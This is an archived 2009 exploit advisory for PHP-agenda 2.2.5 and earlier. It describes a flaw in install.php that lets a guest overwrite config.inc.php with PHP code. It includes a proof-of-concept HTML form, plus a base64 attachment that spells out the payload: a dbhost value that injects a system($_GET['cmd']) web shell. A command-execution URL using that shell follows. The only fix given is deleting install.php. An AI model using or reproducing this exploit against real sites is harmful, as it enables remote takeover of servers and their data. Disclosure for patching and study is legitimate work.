TUCoPS :: HP Unsorted P :: va3127.htm

PHP-agenda <= 2.2.5 Remote File Overwriting
PHP-agenda <= 2.2.5 Remote File Overwriting
PHP-agenda <= 2.2.5 Remote File Overwriting


--0016368e2bc90370450467333c5c
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: PHP-agenda
[+] Version: <= 2.2.5
[+] Website: http://php-agenda.sourceforge.net 

[+] Bugs: [A] Remote File Overwriting

[+] Exploitation: Remote
[+] Date: 10 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Remote File Overwriting

[-] Risk: hight
[-] File affected: install.php

This bug allows a guest to overwrite config.inc.php
inserting PHP code.


*************************************************

[+] Code


- [A] Remote File Overwriting


  PHP-agenda <= 2.2.5 - Remote File Overwriting
  

action="http://www.site.com/path/install.php" method="post"> 
      
      
    

  


To execute commands:

http://www.site.com/path/config.inc.php?cmd=uname -a 


*************************************************

[+] Fix

You must delete install.php after installation.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

--0016368e2bc90370450467333c5c
Content-Type: text/plain; charset=US-ASCII; 
	name="PHP-agenda <= 2.2.5 Remote File Overwriting-10042009.txt"
Content-Disposition: attachment; 
	filename="PHP-agenda <= 2.2.5 Remote File Overwriting-10042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ftcwngkm0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBQSFAtYWdlbmRhClsrXSBWZXJzaW9uOiA8PSAyLjIuNQpbK10gV2Vic2l0ZTog
aHR0cDovL3BocC1hZ2VuZGEuc291cmNlZm9yZ2UubmV0CgpbK10gQnVnczogW0FdIFJlbW90ZSBG
aWxlIE92ZXJ3cml0aW5nCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6IDEwIEFw
ciAyMDA5CgpbK10gRGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEK
WytdIEF1dGhvcjogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRhY3Q6IGUt
bWFpbDogZHJvc29waGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2RlCjMpIEZp
eAoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsr
XSBCdWdzCgoKLSBbQV0gUmVtb3RlIEZpbGUgT3ZlcndyaXRpbmcKClstXSBSaXNrOiBoaWdodApb
LV0gRmlsZSBhZmZlY3RlZDogaW5zdGFsbC5waHAKClRoaXMgYnVnIGFsbG93cyBhIGd1ZXN0IHRv
IG92ZXJ3cml0ZSBjb25maWcuaW5jLnBocAppbnNlcnRpbmcgUEhQIGNvZGUuCgoKKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtB
XSBSZW1vdGUgRmlsZSBPdmVyd3JpdGluZwoKPGh0bWw+CiAgPGhlYWQ+UEhQLWFnZW5kYSA8PSAy
LjIuNSAtIFJlbW90ZSBGaWxlIE92ZXJ3cml0aW5nPC9oZWFkPgogIDxib2R5PgogICAgPGZvcm0g
YWN0aW9uPSJodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5zdGFsbC5waHAiIG1ldGhvZD0icG9z
dCI+CiAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJkYmhvc3QiIHNpemU9IjMwIiB2YWx1
ZT0iJzsgc3lzdGVtKCRfR0VUWydjbWQnXSk7IGVjaG8gJyI+CiAgICAgIDxpbnB1dCB0eXBlPSJz
dWJtaXQiIHZhbHVlPSJFeHBsb2l0ISIgPgogICAgPC9mb3JtPgogIDwvYm9keT4KPC9oZWFkPgoK
VG8gZXhlY3V0ZSBjb21tYW5kczoKCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9jb25maWcuaW5j
LnBocD9jbWQ9dW5hbWUgLWEKCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqCgpbK10gRml4CgpZb3UgbXVzdCBkZWxldGUgaW5zdGFsbC5waHAgYWZ0ZXIg
aW5zdGFsbGF0aW9uLgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKio--0016368e2bc90370450467333c5c--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH